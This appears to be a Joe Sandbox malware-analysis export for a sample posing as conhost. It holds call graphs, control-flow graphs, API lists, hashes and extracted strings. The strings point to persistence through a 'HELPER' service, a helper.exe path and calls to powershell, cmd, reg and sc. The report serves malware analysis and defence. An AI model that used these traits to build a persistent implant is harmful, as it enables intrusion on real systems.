2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014a9 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400014b8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400014c7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400014d6 2403->2404 2405 1400014e5 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 1400014ef 2407->2408 2409 1400014f4 2408->2409 2410 140001394 2 API calls 2408->2410 2411 140001394 2 API calls 2409->2411 2410->2409 2412 1400014fe 2411->2412 2413 140001503 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 14000150d 2415->2416 2417 140001394 2 API calls 2416->2417 2418 140001512 2417->2418 2419 140001394 2 API calls 2418->2419 2420 140001521 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001530 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000153f 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000154e 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000155d 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000156c 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000157b 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000158a 2433->2434 2435 140001394 2 API calls 2434->2435 2436 140001599 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015a8 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015b7 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015c6 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015d5 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015e4 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015f3 2447->2448 2448->2205 2449 140001530 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000153f 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000154e 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000155d 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000156c 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000157b 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000158a 2460->2461 2462 140001394 2 API calls 2461->2462 2463 140001599 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015a8 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015b7 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015c6 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015d5 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015e4 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015f3 2474->2475 2475->2208 2475->2209 2477 140001394 2 API calls 2476->2477 2478 1400014b8 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400014c7 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014d6 2481->2482 2483 1400014e5 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 1400014ef 2485->2486 2487 1400014f4 2486->2487 2488 140001394 2 API calls 2486->2488 2489 140001394 2 API calls 2487->2489 2488->2487 2490 1400014fe 2489->2490 2491 140001503 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 14000150d 2493->2494 2495 140001394 2 API calls 2494->2495 2496 140001512 2495->2496 2497 140001394 2 API calls 2496->2497 2498 140001521 2497->2498 2499 140001394 2 API calls 2498->2499 2500 140001530 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000153f 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000154e 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000155d 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000156c 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000157b 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000158a 2511->2512 2513 140001394 2 API calls 2512->2513 2514 140001599 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015a8 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015b7 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015c6 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015d5 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015e4 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015f3 2525->2526 2526->2217 2527 140001440 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000144f 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000145e 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000146d 2532->2533 2534 140001394 2 API calls 2533->2534 2535 14000147c 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000148b 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000149a 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014a9 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400014b8 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400014c7 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400014d6 2546->2547 2548 1400014e5 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 1400014ef 2550->2551 2552 1400014f4 2551->2552 2553 140001394 2 API calls 2551->2553 2554 140001394 2 API calls 2552->2554 2553->2552 2555 1400014fe 2554->2555 2556 140001503 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 14000150d 2558->2559 2560 140001394 2 API calls 2559->2560 2561 140001512 2560->2561 2562 140001394 2 API calls 2561->2562 2563 140001521 2562->2563 2564 140001394 2 API calls 2563->2564 2565 140001530 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000153f 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000154e 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000155d 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000156c 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000157b 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000158a 2576->2577 2578 140001394 2 API calls 2577->2578 2579 140001599 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015a8 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015b7 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015c6 2584->2585 2586 140001394 2 API calls 2585->2586 2587 1400015d5 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015e4 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015f3 2590->2591 2591->2217 2591->2222 2593 1400014e5 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014ef 2595->2596 2597 1400014f4 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 1400014fe 2599->2600 2601 140001503 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 14000150d 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001512 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001521 2607->2608 2609 140001394 2 API calls 2608->2609 2610 140001530 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000153f 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000154e 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000155d 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000156c 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000157b 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000158a 2621->2622 2623 140001394 2 API calls 2622->2623 2624 140001599 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015a8 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015b7 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015c6 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015d5 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015e4 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015f3 2635->2636 2636->2239 2638 140001394 2 API calls 2637->2638 2639 14000158a 2638->2639 2640 140001394 2 API calls 2639->2640 2641 140001599 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015a8 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015b7 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015c6 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015d5 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015e4 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015f3 2652->2653 2653->2239 2655 140001394 2 API calls 2654->2655 2656 1400015b7 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015c6 2657->2658 2659 140001394 2 API calls 2658->2659 2660 1400015d5 2659->2660 2661 140001394 2 API calls 2660->2661 2662 1400015e4 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400015f3 2663->2664 2664->2239 2666 140001394 2 API calls 2665->2666 2667 140001530 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000153f 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000154e 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000155d 2672->2673 2674 140001394 2 API calls 2673->2674 2675 14000156c 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000157b 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000158a 2678->2679 2680 140001394 2 API calls 2679->2680 2681 140001599 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015a8 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015b7 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015c6 2686->2687 2688 140001394 2 API calls 2687->2688 2689 1400015d5 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015e4 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015f3 2692->2693 2693->2239 2695 140001394 2 API calls 2694->2695 2696 140001431 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001440 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000144f 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000145e 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000146d 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000147c 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000148b 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000149a 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014a9 2711->2712 2713 140001394 2 API calls 2712->2713 2714 1400014b8 2713->2714 2715 140001394 2 API calls 2714->2715 2716 1400014c7 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014d6 2717->2718 2719 1400014e5 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 1400014ef 2721->2722 2723 1400014f4 2722->2723 2724 140001394 2 API calls 2722->2724 2725 140001394 2 API calls 2723->2725 2724->2723 2726 1400014fe 2725->2726 2727 140001503 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 14000150d 2729->2730 2731 140001394 2 API calls 2730->2731 2732 140001512 2731->2732 2733 140001394 2 API calls 2732->2733 2734 140001521 2733->2734 2735 140001394 2 API calls 2734->2735 2736 140001530 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000153f 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000154e 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000155d 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000156c 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000157b 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000158a 2747->2748 2749 140001394 2 API calls 2748->2749 2750 140001599 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015a8 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015b7 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015c6 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015d5 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015e4 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015f3 2761->2762 2762->2239 2764 140001394 2 API calls 2763->2764 2765 140001440 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000144f 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000145e 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000146d 2770->2771 2772 140001394 2 API calls 2771->2772 2773 14000147c 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000148b 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000149a 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014a9 2778->2779 2780 140001394 2 API calls 2779->2780 2781 1400014b8 2780->2781 2782 140001394 2 API calls 2781->2782 2783 1400014c7 2782->2783 2784 140001394 2 API calls 2783->2784 2785 1400014d6 2784->2785 2786 1400014e5 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 1400014ef 2788->2789 2790 1400014f4 2789->2790 2791 140001394 2 API calls 2789->2791 2792 140001394 2 API calls 2790->2792 2791->2790 2793 1400014fe 2792->2793 2794 140001503 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 14000150d 2796->2797 2798 140001394 2 API calls 2797->2798 2799 140001512 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001521 2800->2801 2802 140001394 2 API calls 2801->2802 2803 140001530 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000153f 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000154e 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000155d 2808->2809 2810 140001394 2 API calls 2809->2810 2811 14000156c 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000157b 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000158a 2814->2815 2816 140001394 2 API calls 2815->2816 2817 140001599 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015a8 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015b7 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2239

                                                    Callgraph

                                                    Hide Legend
                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00000001400054E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 73 Function_0000000140001BA0 1->73 2 Function_00000001400014E5 70 Function_0000000140001394 2->70 3 Function_00000001400010F0 4 Function_00000001400055F1 5 Function_00000001400030F1 6 Function_00000001400014F4 6->70 7 Function_0000000140001E00 8 Function_0000000140002F00 55 Function_0000000140001370 8->55 9 Function_0000000140001000 9->7 39 Function_0000000140001750 9->39 77 Function_0000000140001FB0 9->77 86 Function_0000000140001FC0 9->86 10 Function_0000000140001800 65 Function_0000000140002290 10->65 11 Function_0000000140002500 12 Function_0000000140005701 13 Function_0000000140005501 14 Function_0000000140001503 14->70 15 Function_0000000140001404 15->70 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003110 19 Function_0000000140005611 20 Function_0000000140001512 20->70 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140005620 24 Function_0000000140001521 24->70 25 Function_0000000140005521 26 Function_0000000140001422 26->70 27 Function_0000000140001530 27->70 28 Function_0000000140003130 29 Function_0000000140001431 29->70 30 Function_000000014000153F 30->70 31 Function_0000000140001440 31->70 32 Function_0000000140005A40 62 Function_0000000140005780 32->62 33->65 34 Function_0000000140001140 46 Function_0000000140001160 34->46 35 Function_0000000140005541 36 Function_0000000140005641 37 Function_0000000140001F47 56 Function_0000000140001870 37->56 38 Function_0000000140001650 40 Function_0000000140003150 40->8 40->14 40->24 40->26 40->27 40->29 40->30 40->31 44 Function_000000014000145E 40->44 45 Function_0000000140002660 40->45 52 Function_000000014000156C 40->52 53 Function_000000014000146D 40->53 40->55 60 Function_000000014000157B 40->60 40->62 75 Function_00000001400015A8 40->75 76 Function_00000001400014A9 40->76 85 Function_00000001400016C0 40->85 96 Function_00000001400014D6 40->96 98 Function_00000001400026E0 40->98 41 Function_0000000140002050 42 Function_0000000140003051 43 Function_000000014000155D 43->70 44->70 46->40 46->46 46->56 61 Function_0000000140001880 46->61 64 Function_0000000140001F90 46->64 46->85 47 Function_0000000140001760 99 Function_00000001400020E0 47->99 48 Function_0000000140002460 49 Function_0000000140005760 50 Function_0000000140005561 51 Function_0000000140001E65 51->56 52->70 53->70 54 Function_000000014000216F 57 Function_0000000140001A70 57->33 57->73 58 Function_0000000140003070 59 Function_0000000140005671 60->70 61->21 61->33 61->45 61->73 63 Function_0000000140005790 63->62 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005591 70->32 70->63 71 Function_0000000140002194 71->56 72 Function_000000014000219E 73->33 78 Function_00000001400023B0 73->78 89 Function_00000001400024D0 73->89 74 Function_0000000140001FA0 75->70 76->70 79 Function_00000001400022B0 80 Function_00000001400026B0 81 Function_00000001400030B1 82 Function_00000001400055B1 83 Function_00000001400056B1 84 Function_0000000140001AB3 84->33 84->73 87 Function_0000000140001AC3 87->33 87->73 88 Function_00000001400014C7 88->70 90 Function_00000001400017D0 91 Function_0000000140001FD0 92 Function_00000001400026D0 93 Function_00000001400055D1 94 Function_00000001400056D1 95 Function_0000000140001AD4 95->33 95->73 96->70 97 Function_00000001400022E0 98->2 98->6 98->14 98->20 98->43 98->44 98->45 98->55 98->62 98->76 98->88 100 Function_00000001400017E0 100->99

                                                    Executed Functions

                                                    Control-flow Graph

                                                    APIs
                                                    • NtSetInformationWorkerFactory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: FactoryInformationWorker
                                                    • String ID:
                                                    • API String ID: 270927234-0
                                                    • Opcode ID: df00338f29b46ce07bba94e72b7f42f68a5c7378343cee046c78453403dbd4ac
                                                    • Instruction ID: 40ce79e49404c77a01ab76f80399630b332c0bb85c112c07ad511e4ea3c0e0d9
                                                    • Opcode Fuzzy Hash: df00338f29b46ce07bba94e72b7f42f68a5c7378343cee046c78453403dbd4ac
                                                    • Instruction Fuzzy Hash: 7CF0EDB2608B4082EAA2DB52F88438A77A0F38D3C0F008919BBC843735CB38C0948F40

                                                    Non-executed Functions

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                                    • String ID: $ $ImagePath$PROGRAMDATA=$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\bfogiitplfr$\BaseNamedObjects\skejeijusyeobdhqtnfxgvxd$\BaseNamedObjects\tjenyubsywjxjnhy$\Registry\Machine\SYSTEM\CurrentControlSet\Services\HELPER$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\helper\helper.exe$\reg.exe$\sc.exe
                                                    • API String ID: 3506639089-2671066561
                                                    • Opcode ID: f95666245318a25341fbec1f0997073eb1817740d4ddb14f2aa59a0f2be01dac
                                                    • Instruction ID: 03cb50049e616431fab2967809b9b9787a1b3d3d2a65da28f52cd628a9438b75
                                                    • Opcode Fuzzy Hash: f95666245318a25341fbec1f0997073eb1817740d4ddb14f2aa59a0f2be01dac
                                                    • Instruction Fuzzy Hash: 091328B1524AC088F733CB2AB8563E567A4BB9D3C8F445215FFC4676B2EB798285C305

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 293 1400026e0-14000273b call 140002660 memset 296 140002741-14000274b 293->296 297 14000280e-14000285e call 14000155d 293->297 299 140002774-14000277a 296->299 302 140002953-14000297b call 1400014c7 297->302 303 140002864-140002873 297->303 299->297 301 140002780-140002787 299->301 304 140002789-140002792 301->304 305 140002750-140002752 301->305 320 140002986-1400029c8 call 140001503 call 140005780 memset 302->320 321 14000297d 302->321 306 140002eb7-140002ef4 call 140001370 303->306 307 140002879-140002888 303->307 310 140002794-1400027ab 304->310 311 1400027f8-1400027fb 304->311 308 14000275a-14000276e 305->308 312 1400028e4-14000294e wcsncmp call 1400014e5 307->312 313 14000288a-1400028dd 307->313 308->297 308->299 316 1400027f5 310->316 317 1400027ad-1400027c2 310->317 311->308 312->302 313->312 316->311 322 1400027d0-1400027d7 317->322 329 140002e49-140002e84 call 140001370 320->329 330 1400029ce-1400029d5 320->330 321->320 323 1400027d9-1400027f3 322->323 324 140002800-140002809 322->324 323->316 323->322 324->308 333 1400029d7-140002a0c 329->333 337 140002e8a 329->337 332 140002a13-140002a43 wcscpy wcscat wcslen 330->332 330->333 335 140002a45-140002a76 wcslen 332->335 336 140002a78-140002aa5 332->336 333->332 338 140002aa8-140002abf wcslen 335->338 336->338 337->332 339 140002ac5-140002ad8 338->339 340 140002e8f-140002eab call 140001370 338->340 342 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 339->342 343 140002ada-140002aee 339->343 340->306 361 140002dfd-140002e1b call 140001512 342->361 362 140002e20-140002e48 call 14000145e 342->362 343->342 361->362
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                    • String ID: 0$X$`
                                                    • API String ID: 780471329-2527496196
                                                    • Opcode ID: d1974c60ff131fdb0943702a174fea58acad8b7c2a404c9f45051f272aa12fb3
                                                    • Instruction ID: a773b7051c8e8dc8b41d337e0d9dc20bcb8713a93430a0aa50302e5ca6b19fc7
                                                    • Opcode Fuzzy Hash: d1974c60ff131fdb0943702a174fea58acad8b7c2a404c9f45051f272aa12fb3
                                                    • Instruction Fuzzy Hash: 231247B2608BC086E762CB16F8443EA77A4F789794F404215EBA957BF5EF78C189C700

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                    • String ID:
                                                    • API String ID: 2643109117-0
                                                    • Opcode ID: 6a09d78ca0333dec9feef7bb270d0dd64c338d0db327b9b6b1c4529bce61630d
                                                    • Instruction ID: e1b86a8f0a2714341d073f01445bcfce33cf67981b7b45963aa42026beac07c0
                                                    • Opcode Fuzzy Hash: 6a09d78ca0333dec9feef7bb270d0dd64c338d0db327b9b6b1c4529bce61630d
                                                    • Instruction Fuzzy Hash: 445116B1605A4485FA66EF27F9947EA27A1B78D7C0F448021FF8D973B1DE38C4998700

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 407 140001ba0-140001bc0 408 140001bc2-140001bd7 407->408 409 140001c09 407->409 410 140001be9-140001bf1 408->410 411 140001c0c-140001c17 call 1400023b0 409->411 412 140001bf3-140001c02 410->412 413 140001be0-140001be7 410->413 418 140001cf4-140001cfe call 140001d40 411->418 419 140001c1d-140001c6c call 1400024d0 VirtualQuery 411->419 412->413 415 140001c04 412->415 413->410 413->411 417 140001cd7-140001cf3 memcpy 415->417 422 140001d03-140001d1e call 140001d40 418->422 419->422 425 140001c72-140001c79 419->425 426 140001d23-140001d38 GetLastError call 140001d40 422->426 427 140001c7b-140001c7e 425->427 428 140001c8e-140001c97 425->428 432 140001cd1 427->432 433 140001c80-140001c83 427->433 429 140001ca4-140001ccf VirtualProtect 428->429 430 140001c99-140001c9c 428->430 429->426 429->432 430->432 435 140001c9e 430->435 432->417 433->432 434 140001c85-140001c8a 433->434 434->432 437 140001c8c 434->437 435->429 437->435
                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140006B24,0000000140006B24,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140006B24,0000000140006B24,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140006B24,0000000140006B24,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                    • API String ID: 2595394609-2123141913
                                                    • Opcode ID: c25ac58a7cfabb1b9c32a71cc9a2a4ce0f38b7268a129b4de7697477f180976d
                                                    • Instruction ID: cd0807e83405d02598a6432455b4389e311a158dcd9f07c113b42c1e60f40c73
                                                    • Opcode Fuzzy Hash: c25ac58a7cfabb1b9c32a71cc9a2a4ce0f38b7268a129b4de7697477f180976d
                                                    • Instruction Fuzzy Hash: FE4114F1200A4482FA66DF57F884BE927A1F79DBC4F554526EF0A877B1DA38C58AC700

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 438 140005790-1400057ac 439 1400057db-1400057ff call 140005780 438->439 440 1400057ae 438->440 445 140005a26-140005a38 439->445 447 140005805-140005819 call 140005780 439->447 442 1400057b5-1400057ba 440->442 444 1400057c0-1400057c3 442->444 444->445 446 1400057c9-1400057cf 444->446 446->444 448 1400057d1-1400057d6 446->448 451 14000582f-140005841 447->451 448->445 452 140005823-14000582d 451->452 453 140005843-14000585d call 140005780 451->453 452->451 454 140005885-140005888 452->454 459 14000585f-140005881 call 140005780 * 2 453->459 460 140005820 453->460 454->445 456 14000588e-1400058ba call 140005780 malloc 454->456 464 140005a1c 456->464 465 1400058c0-1400058c2 456->465 459->452 470 140005883 459->470 460->452 464->445 465->464 467 1400058c8-1400058f8 call 140005780 * 2 465->467 474 140005900-140005917 467->474 470->456 475 1400059f3-1400059fb 474->475 476 14000591d-140005923 474->476 479 140005a06-140005a14 475->479 480 1400059fd-140005a00 475->480 477 140005972 476->477 478 140005925-140005943 call 140005780 476->478 483 140005977-1400059b9 call 140005780 * 2 477->483 486 140005950-14000596e 478->486 